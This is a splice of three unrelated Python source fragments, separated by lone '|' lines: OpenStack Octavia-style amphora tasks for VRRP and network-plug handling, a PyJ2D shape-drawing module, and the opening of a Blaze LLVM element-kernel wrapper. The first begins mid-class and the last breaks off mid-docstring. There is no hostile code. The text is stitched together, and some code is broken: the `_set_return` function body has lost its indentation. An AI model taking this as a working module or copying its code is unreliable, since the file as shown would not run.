        """Handle a failed listener delete.

        Marks the listener provisioning status ERROR.
        """
        LOG.warning("Reverting listener delete.")
        self.task_utils.mark_listener_prov_status_error(
            listener[constants.LISTENER_ID])
class AmphoraGetInfo(BaseAmphoraTask):
    """Task to get information on an amphora."""

    def execute(self, amphora):
        """Execute get_info routine for an amphora."""
        session = db_apis.get_session()
        amphora_obj = self.amphora_repo.get(session,
                                            id=amphora[constants.ID])
        self.amphora_driver.get_info(amphora_obj)
class AmphoraGetDiagnostics(BaseAmphoraTask):
    """Task to get diagnostics on the amphora and the loadbalancers."""

    def execute(self, amphora):
        """Execute get_diagnostic routine for an amphora."""
        # Pass the amphora dict straight through to the driver.
        self.amphora_driver.get_diagnostics(amphora)
class AmphoraFinalize(BaseAmphoraTask):
    """Task to finalize the amphora before any listeners are configured."""
    def execute(self, amphora):
        """Execute finalize_amphora routine.

        :param amphora: Amphora dict (provider format).
        """
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora.get(constants.ID))
        self.amphora_driver.finalize_amphora(db_amp)
        LOG.debug("Finalized the amphora.")
    def revert(self, result, amphora, *args, **kwargs):
        """Handle a failed amphora finalize."""
        # If execute itself failed there is nothing to undo.
        if isinstance(result, failure.Failure):
            return
        LOG.warning("Reverting amphora finalize.")
        self.task_utils.mark_amphora_status_error(
            amphora.get(constants.ID))
class AmphoraPostNetworkPlug(BaseAmphoraTask):
    """Task to notify the amphora post network plug."""
    def execute(self, amphora, ports):
        """Execute post_network_plug routine.

        :param amphora: Amphora dict (provider format).
        :param ports: List of serialized port dicts; each is rebuilt into
            data model objects and passed to the driver, one call per port.
        """
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora[constants.ID])
        for port in ports:
            # NOTE: pop() mutates the port dict in place; the remaining
            # keys become Port constructor kwargs below.
            net = data_models.Network(**port.pop(constants.NETWORK))
            ips = port.pop(constants.FIXED_IPS)
            fixed_ips = []
            for ip in ips:
                subnet_arg = ip.pop(constants.SUBNET)
                host_routes = subnet_arg.get('host_routes')
                if host_routes:
                    # Rehydrate host routes into data model objects.
                    subnet_arg['host_routes'] = [
                        data_models.HostRoute(**hr)
                        for hr in host_routes
                    ]
                fixed_ips.append(data_models.FixedIP(
                    subnet=data_models.Subnet(**subnet_arg), **ip))
            self.amphora_driver.post_network_plug(
                db_amp, data_models.Port(network=net, fixed_ips=fixed_ips,
                                         **port))
            LOG.debug("post_network_plug called on compute instance "
                      "%(compute_id)s for port %(port_id)s",
                      {"compute_id": amphora[constants.COMPUTE_ID],
                       "port_id": port[constants.ID]})
    def revert(self, result, amphora, *args, **kwargs):
        """Handle a failed post network plug."""
        if isinstance(result, failure.Failure):
            return
        LOG.warning("Reverting post network plug.")
        self.task_utils.mark_amphora_status_error(amphora.get(constants.ID))
class AmphoraePostNetworkPlug(BaseAmphoraTask):
    """Task to notify the amphorae post network plug."""
    def execute(self, loadbalancer, added_ports):
        """Execute post_network_plug routine.

        :param loadbalancer: Load balancer dict (provider format).
        :param added_ports: Mapping of amphora id -> list of new port
            dicts; only amphorae present in this mapping are notified.
        """
        amp_post_plug = AmphoraPostNetworkPlug()
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        for amphora in db_lb.amphorae:
            if amphora.id in added_ports:
                amp_post_plug.execute(amphora.to_dict(),
                                      added_ports[amphora.id])
    def revert(self, result, loadbalancer, added_ports, *args, **kwargs):
        """Handle a failed post network plug."""
        if isinstance(result, failure.Failure):
            return
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        LOG.warning("Reverting post network plug.")
        # Only amphorae still in ALLOCATED state are marked ERROR.
        for amphora in filter(
                lambda amp: amp.status == constants.AMPHORA_ALLOCATED,
                db_lb.amphorae):
            self.task_utils.mark_amphora_status_error(amphora.id)
class AmphoraPostVIPPlug(BaseAmphoraTask):
    """Task to notify the amphora post VIP plug."""
    def execute(self, amphora, loadbalancer, amphorae_network_config):
        """Execute post_vip_routine.

        :param amphora: Amphora dict (provider format).
        :param loadbalancer: Load balancer dict (provider format).
        :param amphorae_network_config: Per-amphora network config keyed
            by amphora id; supplies the VRRP port and VIP subnet.
        """
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora.get(constants.ID))
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        vrrp_port = data_models.Port(
            **amphorae_network_config[
                amphora.get(constants.ID)][constants.VRRP_PORT])
        # Required for noop-case
        vip_arg = copy.deepcopy(
            amphorae_network_config[
                amphora.get(constants.ID)][constants.VIP_SUBNET])
        if vip_arg:
            host_routes = vip_arg.get('host_routes')
            if host_routes:
                # Rehydrate host routes into data model objects.
                vip_arg['host_routes'] = [
                    data_models.HostRoute(**hr)
                    for hr in host_routes
                ]
            vip_subnet = data_models.Subnet(**vip_arg)
        else:
            # Empty config (noop drivers) still needs a Subnet object.
            vip_subnet = data_models.Subnet()
        self.amphora_driver.post_vip_plug(
            db_amp, db_lb, amphorae_network_config, vrrp_port=vrrp_port,
            vip_subnet=vip_subnet)
        LOG.debug("Notified amphora of vip plug")
    def revert(self, result, amphora, loadbalancer, *args, **kwargs):
        """Handle a failed amphora vip plug notification."""
        if isinstance(result, failure.Failure):
            return
        LOG.warning("Reverting post vip plug.")
        self.task_utils.mark_amphora_status_error(amphora.get(constants.ID))
class AmphoraePostVIPPlug(BaseAmphoraTask):
    """Task to notify the amphorae post VIP plug."""

    def execute(self, loadbalancer, amphorae_network_config):
        """Execute post_vip_plug across the amphorae."""
        per_amp_task = AmphoraPostVIPPlug()
        db_lb = self.loadbalancer_repo.get(
            db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
        # Fan the notification out to every amphora on the load balancer.
        for amp in db_lb.amphorae:
            per_amp_task.execute(
                amp.to_dict(), loadbalancer, amphorae_network_config)
class AmphoraCertUpload(BaseAmphoraTask):
    """Upload a certificate to the amphora."""
    def execute(self, amphora, server_pem):
        """Execute cert_update_amphora routine.

        :param amphora: Amphora dict (provider format).
        :param server_pem: Fernet-encrypted PEM payload; decrypted here
            before being sent to the amphora.
        """
        LOG.debug("Upload cert in amphora REST driver")
        key = utils.get_compatible_server_certs_key_passphrase()
        fer = fernet.Fernet(key)
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora.get(constants.ID))
        self.amphora_driver.upload_cert_amp(
            db_amp, fer.decrypt(server_pem.encode('utf-8')))
# TODO(johnsom) REMOVE ME!
class AmphoraUpdateVRRPInterface(BaseAmphoraTask):
    """Task to get and update the VRRP interface device name from amphora."""
    def execute(self, amphora, timeout_dict=None):
        """Look up the VRRP interface and persist it on the amphora row.

        :param amphora: Amphora dict (provider format).
        :param timeout_dict: Optional driver timeout overrides.
        :returns: The interface device name, or None on failure (the
            amphora is marked ERROR instead of failing the flow).
        """
        try:
            # TODO(johnsom) Optimize this to use the dicts and not need the
            # DB lookups
            db_amp = self.amphora_repo.get(db_apis.get_session(),
                                           id=amphora[constants.ID])
            interface = self.amphora_driver.get_interface_from_ip(
                db_amp, db_amp.vrrp_ip, timeout_dict=timeout_dict)
        except Exception as e:
            # This can occur when an active/standby LB has no listener
            LOG.error('Failed to get amphora VRRP interface on amphora '
                      '%s. Skipping this amphora as it is failing due to: '
                      '%s', amphora.get(constants.ID), str(e))
            self.amphora_repo.update(db_apis.get_session(),
                                     amphora.get(constants.ID),
                                     status=constants.ERROR)
            return None
        self.amphora_repo.update(db_apis.get_session(), amphora[constants.ID],
                                 vrrp_interface=interface)
        return interface
class AmphoraIndexUpdateVRRPInterface(BaseAmphoraTask):
    """Task to get and update the VRRP interface device name from amphora."""
    def execute(self, amphora_index, amphorae, timeout_dict=None):
        """Look up and persist the VRRP interface for one amphora.

        :param amphora_index: Index of the target amphora in ``amphorae``.
        :param amphorae: List of amphora dicts.
        :param timeout_dict: Optional driver timeout overrides.
        :returns: The interface device name, or None on failure (the
            amphora is marked ERROR instead of failing the flow).
        """
        amphora_id = amphorae[amphora_index][constants.ID]
        try:
            # TODO(johnsom) Optimize this to use the dicts and not need the
            # DB lookups
            db_amp = self.amphora_repo.get(db_apis.get_session(),
                                           id=amphora_id)
            interface = self.amphora_driver.get_interface_from_ip(
                db_amp, db_amp.vrrp_ip, timeout_dict=timeout_dict)
        except Exception as e:
            # This can occur when an active/standby LB has no listener
            LOG.error('Failed to get amphora VRRP interface on amphora '
                      '%s. Skipping this amphora as it is failing due to: '
                      '%s', amphora_id, str(e))
            self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                     status=constants.ERROR)
            return None
        self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                 vrrp_interface=interface)
        return interface
class AmphoraVRRPUpdate(BaseAmphoraTask):
    """Task to update the VRRP configuration of an amphora."""

    def execute(self, loadbalancer_id, amphorae_network_config, amphora,
                amp_vrrp_int, timeout_dict=None):
        """Push an updated keepalived (VRRP) configuration to one amphora.

        :param loadbalancer_id: ID of the load balancer being updated.
        :param amphorae_network_config: Per-amphora network configuration.
        :param amphora: Amphora dict (provider format).
        :param amp_vrrp_int: VRRP interface device name for this amphora.
        :param timeout_dict: Optional driver timeout overrides.
        """
        # Note, we don't want this to cause a revert as it may be used
        # in a failover flow with both amps failing. Skip it and let
        # health manager fix it.
        amphora_id = amphora[constants.ID]
        try:
            # TODO(johnsom) Optimize this to use the dicts and not need the
            # DB lookups
            db_amp = self.amphora_repo.get(db_apis.get_session(),
                                           id=amphora_id)
            loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
                                                      id=loadbalancer_id)
            db_amp.vrrp_interface = amp_vrrp_int
            self.amphora_driver.update_vrrp_conf(
                loadbalancer, amphorae_network_config, db_amp, timeout_dict)
        except Exception as e:
            LOG.error('Failed to update VRRP configuration amphora %s. '
                      'Skipping this amphora as it is failing to update due '
                      'to: %s', amphora_id, str(e))
            self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                     status=constants.ERROR)
            # Bug fix: stop here on failure so the success message below is
            # not logged, mirroring AmphoraIndexVRRPUpdate.
            return
        LOG.debug("Uploaded VRRP configuration of amphora %s.", amphora_id)
class AmphoraIndexVRRPUpdate(BaseAmphoraTask):
    """Task to update the VRRP configuration of an amphora."""
    def execute(self, loadbalancer_id, amphorae_network_config, amphora_index,
                amphorae, amp_vrrp_int, timeout_dict=None):
        """Execute update_vrrp_conf.

        :param loadbalancer_id: ID of the load balancer being updated.
        :param amphorae_network_config: Per-amphora network configuration.
        :param amphora_index: Index of the target amphora in ``amphorae``.
        :param amphorae: List of amphora dicts.
        :param amp_vrrp_int: VRRP interface device name for this amphora.
        :param timeout_dict: Optional driver timeout overrides.
        """
        # Note, we don't want this to cause a revert as it may be used
        # in a failover flow with both amps failing. Skip it and let
        # health manager fix it.
        amphora_id = amphorae[amphora_index][constants.ID]
        try:
            # TODO(johnsom) Optimize this to use the dicts and not need the
            # DB lookups
            db_amp = self.amphora_repo.get(db_apis.get_session(),
                                           id=amphora_id)
            loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
                                                      id=loadbalancer_id)
            db_amp.vrrp_interface = amp_vrrp_int
            self.amphora_driver.update_vrrp_conf(
                loadbalancer, amphorae_network_config, db_amp, timeout_dict)
        except Exception as e:
            LOG.error('Failed to update VRRP configuration amphora %s. '
                      'Skipping this amphora as it is failing to update due '
                      'to: %s', amphora_id, str(e))
            self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                     status=constants.ERROR)
            return
        LOG.debug("Uploaded VRRP configuration of amphora %s.", amphora_id)
class AmphoraVRRPStart(BaseAmphoraTask):
    """Task to start keepalived on an amphora.
    This will reload keepalived if it is already running.
    """

    def execute(self, amphora, timeout_dict=None):
        # TODO(johnsom) Optimize this to use the dicts and not need the
        # DB lookups
        amphora_id = amphora[constants.ID]
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora_id)
        self.amphora_driver.start_vrrp_service(db_amp, timeout_dict)
        LOG.debug("Started VRRP on amphora %s.", amphora_id)
class AmphoraIndexVRRPStart(BaseAmphoraTask):
    """Task to start keepalived on an amphora.
    This will reload keepalived if it is already running.
    """
    def execute(self, amphora_index, amphorae, timeout_dict=None):
        # TODO(johnsom) Optimize this to use the dicts and not need the
        # DB lookups
        amphora_id = amphorae[amphora_index][constants.ID]
        db_amp = self.amphora_repo.get(db_apis.get_session(), id=amphora_id)
        try:
            self.amphora_driver.start_vrrp_service(db_amp, timeout_dict)
        except Exception as e:
            # Don't fail the flow; mark the amphora ERROR and let the
            # health manager repair it later.
            LOG.error('Failed to start VRRP on amphora %s. '
                      'Skipping this amphora as it is failing to start due '
                      'to: %s', amphora_id, str(e))
            self.amphora_repo.update(db_apis.get_session(), amphora_id,
                                     status=constants.ERROR)
            return
        LOG.debug("Started VRRP on amphora %s.",
                  amphorae[amphora_index][constants.ID])
class AmphoraComputeConnectivityWait(BaseAmphoraTask):
    """Task to wait for the compute instance to be up."""

    def execute(self, amphora, raise_retry_exception=False):
        """Execute get_info routine for an amphora until it responds.

        :param amphora: Amphora dict (provider format).
        :param raise_retry_exception: Passed through to the driver so it
            can raise a retryable exception instead of timing out.
        :raises TimeOutException: When the amphora never becomes
            reachable; the amphora is marked ERROR before re-raising.
        """
        try:
            db_amphora = self.amphora_repo.get(
                db_apis.get_session(), id=amphora.get(constants.ID))
            amp_info = self.amphora_driver.get_info(
                db_amphora, raise_retry_exception=raise_retry_exception)
            # Fixed typo in the original log message ("Successfuly").
            LOG.debug('Successfully connected to amphora %s: %s',
                      amphora.get(constants.ID), amp_info)
        except driver_except.TimeOutException:
            LOG.error("Amphora compute instance failed to become reachable. "
                      "This either means the compute driver failed to fully "
                      "boot the instance inside the timeout interval or the "
                      "instance is not reachable via the lb-mgmt-net.")
            self.amphora_repo.update(db_apis.get_session(),
                                     amphora.get(constants.ID),
                                     status=constants.ERROR)
            raise
class AmphoraConfigUpdate(BaseAmphoraTask):
    """Task to push a new amphora agent configuration to the amphora."""

    def execute(self, amphora, flavor):
        """Build and push the agent configuration to one amphora.

        :param amphora: Amphora dict (provider format).
        :param flavor: Flavor dict; may override the LB topology.
        """
        # Extract any flavor based settings
        if flavor:
            topology = flavor.get(constants.LOADBALANCER_TOPOLOGY,
                                  CONF.controller_worker.loadbalancer_topology)
        else:
            topology = CONF.controller_worker.loadbalancer_topology
        # Build the amphora agent config
        agent_cfg_tmpl = agent_jinja_cfg.AgentJinjaTemplater()
        agent_config = agent_cfg_tmpl.build_agent_config(
            amphora.get(constants.ID), topology)
        db_amp = self.amphora_repo.get(db_apis.get_session(),
                                       id=amphora[constants.ID])
        # Push the new configuration to the amphora
        try:
            self.amphora_driver.update_amphora_agent_config(db_amp,
                                                            agent_config)
        except driver_except.AmpDriverNotImplementedError:
            # Use lazy %-style logging args (consistent with the rest of
            # this module) instead of eagerly formatting with str.format().
            LOG.error('Amphora %s does not support agent configuration '
                      'update. Please update the amphora image for this '
                      'amphora. Skipping.', amphora.get(constants.ID))
|
|
#PyJ2D - Copyright (C) 2011 James Garnon <https://gatc.ca/>
#Released under the MIT License <https://opensource.org/licenses/MIT>
from math import pi as _pi
from java.awt import BasicStroke, RenderingHints
from java.awt.geom import Ellipse2D
from pyj2d.rect import Rect
from pyj2d.color import Color
__docformat__ = 'restructuredtext'
__doc__ = 'Draw shapes'
# Conversion factor from radians to degrees, used by arc().
_rad_deg = 180.0/_pi
# Module flag: when False the draw functions return None instead of a
# bounding Rect (see bounding_rect_return()).
_return_rect = True
def rect(surface, color, rect, width=0):
    """
    Draw rectangle shape, and returns bounding Rect.
    Arguments include surface to draw, color, Rect.
    Optional width argument of outline, which defaults to 0 for filled shape.
    """
    if not hasattr(rect, 'width'):
        rect = Rect(rect)
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    if width:
        graphics.setStroke(BasicStroke(width))
        graphics.drawRect(rect.x, rect.y, rect.width, rect.height)
    else:
        graphics.fillRect(rect.x, rect.y, rect.width, rect.height)
    graphics.dispose()
    if _return_rect:
        return surface.get_rect().clip(rect)
    return None
def circle(surface, color, position, radius, width=0):
    """
    Draw circular shape, and returns bounding Rect.
    Arguments include surface to draw, color, position and radius.
    Optional width argument of outline, which defaults to 0 for filled shape.
    """
    bounds = Rect(position[0]-radius, position[1]-radius,
                  2*radius, 2*radius)
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    graphics.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                              RenderingHints.VALUE_ANTIALIAS_ON)
    if width:
        graphics.setStroke(BasicStroke(width))
        graphics.drawOval(bounds.x, bounds.y, bounds.width, bounds.height)
    else:
        graphics.fillOval(bounds.x, bounds.y, bounds.width, bounds.height)
    graphics.dispose()
    if _return_rect:
        return surface.get_rect().clip(bounds)
    return None
def ellipse(surface, color, rect, width=0):
    """
    Draw ellipse shape, and returns bounding Rect.
    Arguments include surface to draw, color, and rect.
    Optional width argument of outline, which defaults to 0 for filled shape.
    """
    if not hasattr(rect, 'width'):
        rect = Rect(rect)
    g = surface.createGraphics()
    if hasattr(color, 'a'):
        g.setColor(color)
    else:
        g.setColor(Color(color))
    g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                       RenderingHints.VALUE_ANTIALIAS_ON)
    ellipse = Ellipse2D.Double(rect.x, rect.y, rect.width, rect.height)
    if width:
        # Bug fix: set the stroke so the outline honors the requested
        # width, consistent with rect/circle/arc.
        g.setStroke(BasicStroke(width))
        g.draw(ellipse)
    else:
        g.fill(ellipse)
    g.dispose()
    if not _return_rect:
        return None
    return surface.get_rect().clip(rect)
def arc(surface, color, rect, start_angle, stop_angle, width=1):
    """
    Draw arc shape, and returns bounding Rect.
    Arguments include surface to draw, color, rect, start_angle, stop_angle.
    Optional width argument of outline.
    """
    if not hasattr(rect, 'width'):
        rect = Rect(rect)
    # Angles arrive in radians; Java2D drawArc/fillArc take degrees.
    begin_deg = int(start_angle * _rad_deg)
    end_deg = int(stop_angle * _rad_deg)
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    graphics.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                              RenderingHints.VALUE_ANTIALIAS_ON)
    if width:
        graphics.setStroke(BasicStroke(width))
        graphics.drawArc(rect.x, rect.y, rect.width-1, rect.height-1,
                         begin_deg, end_deg)
    else:
        graphics.fillArc(rect.x, rect.y, rect.width-1, rect.height-1,
                         begin_deg, end_deg)
    graphics.dispose()
    if _return_rect:
        return surface.get_rect().clip(rect)
    return None
def polygon(surface, color, pointlist, width=0):
    """
    Draw polygon shape, and returns bounding Rect.
    Arguments include surface to draw, color, and pointlist.
    Optional width argument of outline, which defaults to 0 for filled shape.
    """
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    graphics.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                              RenderingHints.VALUE_ANTIALIAS_ON)
    xcoords = [int(pt[0]) for pt in pointlist]
    ycoords = [int(pt[1]) for pt in pointlist]
    count = len(pointlist)
    if width:
        graphics.setStroke(BasicStroke(width))
        graphics.drawPolygon(xcoords, ycoords, count)
    else:
        graphics.fillPolygon(xcoords, ycoords, count)
    graphics.dispose()
    if not _return_rect:
        return None
    left, right = min(xcoords), max(xcoords)
    top, bottom = min(ycoords), max(ycoords)
    bounds = Rect(left, top, right-left+1, bottom-top+1)
    return surface.get_rect().clip(bounds)
def line(surface, color, point1, point2, width=1):
    """
    Draw line, and returns bounding Rect.
    Arguments include surface to draw, color, point1, point2.
    Optional width argument of line.
    """
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    graphics.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                              RenderingHints.VALUE_ANTIALIAS_ON)
    graphics.setStroke(BasicStroke(width))
    graphics.drawLine(int(point1[0]), int(point1[1]),
                      int(point2[0]), int(point2[1]))
    graphics.dispose()
    if not _return_rect:
        return None
    left = min(point1[0], point2[0])
    right = max(point1[0], point2[0])
    top = min(point1[1], point2[1])
    bottom = max(point1[1], point2[1])
    bounds = Rect(left, top, right-left+1, bottom-top+1)
    return surface.get_rect().clip(bounds)
def lines(surface, color, closed, pointlist, width=1):
    """
    Draw interconnected lines, and returns Rect bound.
    Arguments include surface to draw, color, closed, and pointlist.
    Optional width argument of line.
    """
    xcoords = [int(p[0]) for p in pointlist]
    ycoords = [int(p[1]) for p in pointlist]
    if closed:
        # Close the shape by repeating the first vertex at the end.
        xcoords.append(xcoords[0])
        ycoords.append(ycoords[0])
    count = len(xcoords)
    graphics = surface.createGraphics()
    if hasattr(color, 'a'):
        graphics.setColor(color)
    else:
        graphics.setColor(Color(color))
    graphics.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
                              RenderingHints.VALUE_ANTIALIAS_ON)
    graphics.setStroke(BasicStroke(width))
    graphics.drawPolyline(xcoords, ycoords, count)
    graphics.dispose()
    if not _return_rect:
        return None
    left, right = min(xcoords), max(xcoords)
    top, bottom = min(ycoords), max(ycoords)
    bounds = Rect(left, top, right-left+1, bottom-top+1)
    return surface.get_rect().clip(bounds)
def aaline(surface, color, point1, point2, blend=1):
    """
    Draw line, and returns bounding Rect.
    Arguments include surface to draw, color, point1, point2.
    """
    # line() already renders with antialiasing enabled; delegate directly.
    return line(surface, color, point1, point2)
def aalines(surface, color, closed, pointlist, blend=1):
    """
    Draw interconnected lines, and returns Rect bound.
    Arguments include surface to draw, color, closed, and pointlist.
    """
    # lines() already renders with antialiasing enabled; delegate directly.
    return lines(surface, color, closed, pointlist)
def bounding_rect_return(setting):
    """
    Set whether draw functions return bounding Rect.
    Setting (bool) defaults to True on module initialization.
    """
    # Toggle the module-level flag consulted by every draw function.
    global _return_rect
    _return_rect = setting
#depreciated
def _set_return(*args):
msg = 'set_return depreciated, use bounding_rect_return'
raise Exception(msg)
set_return = _set_return
|
|
"""
A Blaze Element Kernel is a wrapper around an LLVM Function with a
particular signature.
The kinds of argument types are simple, ptr, and array.
A kernel kind is a tuple of input kinds followed by the output kind
simple: out_type @func(in1_type %a, in2_type %b)
ptrs: void @func(in1_type * %a, in2_type * %b, out_type * %out)
array_0: void @func(in1_array0 * %a, in2_array0 * %b, out_array0* %out)
array_1: void @func(in1_array1 * %a, in2_array1 * %b, out_array1* %out)
array_2: void @func(in1_array2 * %a, in2_array2 * %b, out_array2* %out)
where array_n is one of the array_kinds in llvm_array
Notice that while the examples have functions with all the
same kinds, the kind is a per-argument notion and thus
can be mixed and matched.
"""
from __future__ import absolute_import, division, print_function
import sys
import llvm.core as lc
from llvm.core import Function, Module
from llvm import LLVMException
from blaze.py2help import _strtypes
from .. import llvm_array as lla
from ..llvm_array import (void_type, SCALAR, POINTER, array_kinds, check_array,
get_cpp_template, array_type)
from .llutil import map_llvm_to_ctypes
from .jit_ckernel import jit_compile_ckernel_deferred
# All recognized argument kinds: scalar, pointer, and the array kinds.
arg_kinds = (SCALAR, POINTER) + array_kinds
# Export each array kind under its string name at module level
# (e.g. C_CONTIGUOUS), then clean up the loop temporaries.
_g = globals()
for this in array_kinds:
    _g[lla.kind_to_str(this)] = this
del this, _g
# Reverse-lookup cache; populated lazily elsewhere.
_invmap = {}
class BlazeElementKernel(object):
    """
    A wrapper around an LLVM Function object
    But, Blaze Element Kernels may be re-attached to different LLVM
    modules as needed using the attach method.
    To inline functions we can either:
    1) Execute f.add_attribute(lc.ATTR_ALWAYS_INLINE) to always inline
    a particular function 'f'
    2) Execute llvm.core.inline_function(callinst) on the output of the
    call function when the function is used.
    If dshapes is provided then this will be a seq of data-shape objects
    which can be helpful in generating a ctypes-callable wrapper
    otherwise the dshape will be inferred from llvm function (but this
    loses information like the sign).
    """
    _ee = None
    _dshapes = None
    _lifted_cache = {}
    _shape_func = None

    def __init__(self, func, dshapes=None):
        if not isinstance(func, Function):
            raise ValueError("Function should be an LLVM Function."
                             " Try a converter method.")
        self.func = func
        # We are forcing blaze functions to fully inline
        func.add_attribute(lc.ATTR_ALWAYS_INLINE)
        # Convert the LLVM function type into arguments
        func_type = func.type.pointee
        self.argtypes = func_type.args
        self.return_type = func_type.return_type
        kindlist = [None] * func_type.arg_count
        # The output may come either via the function's return, or if the
        # function is void, an extra pointer argument at the end.
        if func_type.return_type != void_type:
            kindlist.append(SCALAR)
        for i, arg in enumerate(func_type.args):
            if not isinstance(arg, lc.PointerType):
                kindlist[i] = SCALAR
            else:  # kind is a tuple if an array
                kind = check_array(arg.pointee)
                if kind is None:
                    kind = POINTER
                kindlist[i] = kind
        self._kinds = tuple(kindlist)
        # Keep a handle on the module object
        self.module = func.module
        self._init_dshapes(dshapes)

    @property
    def kinds(self):
        """An array of 'kinds' describing the parameters the
        kernel function accepts. Each kind may be SCALAR, POINTER,
        or a 3-tuple (array_kind, ndim, llvm_eltype).
        """
        return self._kinds

    def _init_dshapes(self, dshapes):
        """Store dshapes (inferring from LLVM types when not provided)
        and derive per-argument ranks.
        """
        if dshapes is None:
            # Create dshapes from llvm if none provided
            from datashape.util import from_llvm
            ds = [from_llvm(llvm, kind)
                  for llvm, kind in zip(self.argtypes, self.kinds)]
            if self.kinds[-1] == SCALAR:
                ds.append(from_llvm(self.return_type))
            self._dshapes = tuple(ds)
            self.ranks = [len(el) - 1 if el else 0 for el in ds]
        else:
            for i, kind in enumerate(self.kinds):
                if isinstance(kind, tuple) and kind[0] in array_kinds and \
                        len(dshapes[i]) == 1 and not kind[1] == 0:
                    raise ValueError("Non-scalar function argument "
                                     "but scalar rank in argument %d" % i)
            self._dshapes = tuple(dshapes)
            self.ranks = [len(el) - 1 for el in dshapes]

    @property
    def dshapes(self):
        return self._dshapes

    def _get_ctypes(self):
        """Map the kernel's LLVM signature to ctypes types.

        Returns (out_type, argument ctypes) where out_type is None for
        void kernels. Uses the module-level ``sys`` import (the original
        re-imported sys locally, which was redundant).
        """
        if self.return_type == void_type:
            out_type = None
            indx = slice(None)
        else:
            out_type = map_llvm_to_ctypes(self.return_type)
            indx = slice(None, -1)
        names = []
        for x in self.dshapes[indx]:
            if hasattr(x, 'measure'):
                name = str(x.measure)
            elif hasattr(x, 'name'):
                name = str(x.name)
            else:
                name = None
            names.append(name)
        mod = sys.modules['blaze']
        modules = [mod] * len(names)
        argtypes = [refresh_name(typ, self.module) for typ in self.argtypes]
        return out_type, map(map_llvm_to_ctypes, argtypes, modules, names)

    @property
    def nin(self):
        # Number of input arguments; the final kind describes the output.
        # Bug fix: the original referenced the non-existent ``self.kind``
        # attribute (AttributeError); the property is named ``kinds``.
        return len(self.kinds) - 1

    @property
    def shapefunc(self):
        """a.shapefunc(*shapes)
        This function maps argument shapes to an output shape,
        using the dshape signature of the blaze kernel. It does
        this by matching the TypeVar shapes in the input datashapes
        which have a corresponding entry in the output datashape.
        """
        if self._shape_func is None:
            if self.ranks[-1] == 0:
                # Scalar output: the shape is always the empty tuple.
                self._shape_func = lambda *args: ()
            else:
                symbols = [[sh.symbol for sh in dshape.shape]
                           for dshape in self.dshapes]
                outshapes = []
                for symbol in symbols[-1]:
                    # Find first occurrence of symbol in other shapes
                    for i, arg in enumerate(symbols[:-1]):
                        try:
                            index = arg.index(symbol)
                            break
                        except ValueError:
                            continue
                    outshapes.append((i, index))
                # outshapes is a list of tuples where first argument is
                # which arg and second is which dim
                def shape_func(*args):
                    shape = tuple(args[i][j] for i, j in outshapes)
                    return shape
                self._shape_func = shape_func
        return self._shape_func

    @staticmethod
    def fromcfunc(cfunc):
        raise NotImplementedError

    def make_ckernel_deferred(self, out_dshape):
        return jit_compile_ckernel_deferred(self, out_dshape)

    # Should probably check to ensure kinds still match
    def replace_func(self, func):
        self.func = func
        self._ee = None
        self.module = func.module

    def attach(self, module):
        """Update this kernel to be attached to a particular module
        Return None
        """
        if not isinstance(module, Module):
            raise TypeError("Must provide an LLVM module object to attach kernel")
        if module is self.module:  # Already attached
            return
        try:
            # This assumes unique names for functions and just
            # replaces the function with one named from module
            # Should check to ensure kinds still match
            self.replace_func(module.get_function_named(self.func.name))
            return
        except LLVMException:
            pass
        # Link the module the function is part of to this module
        new_module = self.func.module.clone()
        module.link_in(new_module)
        # Re-set the function object to the newly linked function
        self.replace_func(module.get_function_named(self.func.name))
def get_eltype(argtype, kind):
    # Resolve the element type for an argument given its kind.
    if kind == SCALAR:
        return argtype
    if kind == POINTER:
        return argtype.pointee
    # Array kind: the first struct member is a pointer to element data.
    return argtype.pointee.elements[0].pointee
# Currently only works for scalar kernels
def frompyfunc(pyfunc, signature, dshapes=None):
    """Build a BlazeElementKernel by numba-jitting a Python function.

    ``signature`` may be a numba signature string, a (argtypes, restype)
    tuple, or a list of argtypes. When ``dshapes`` is omitted it is
    derived from the jitted function's numba signature.
    """
    import numba
    from datashape.util import from_numba
    if isinstance(signature, _strtypes):
        jitter = numba.jit(signature)
    elif isinstance(signature, tuple):
        jitter = numba.jit(restype=signature[1], argtypes=signature[0])
    elif isinstance(signature, list):
        jitter = numba.jit(argtypes=signature)
    else:
        raise ValueError("Signature must be list, tuple, "
                         "or string, not %s" % type(signature))
    numbafunc = jitter(pyfunc)
    if dshapes is None:
        dshapes = [from_numba(arg) for arg in numbafunc.signature.args]
        dshapes.append(from_numba(numbafunc.signature.return_type))
    krnl = BlazeElementKernel(numbafunc.lfunc, dshapes)
    return krnl
def fromcpp(source):
    """Compile a C++ source snippet with clang and wrap the first
    function found as a BlazeElementKernel.

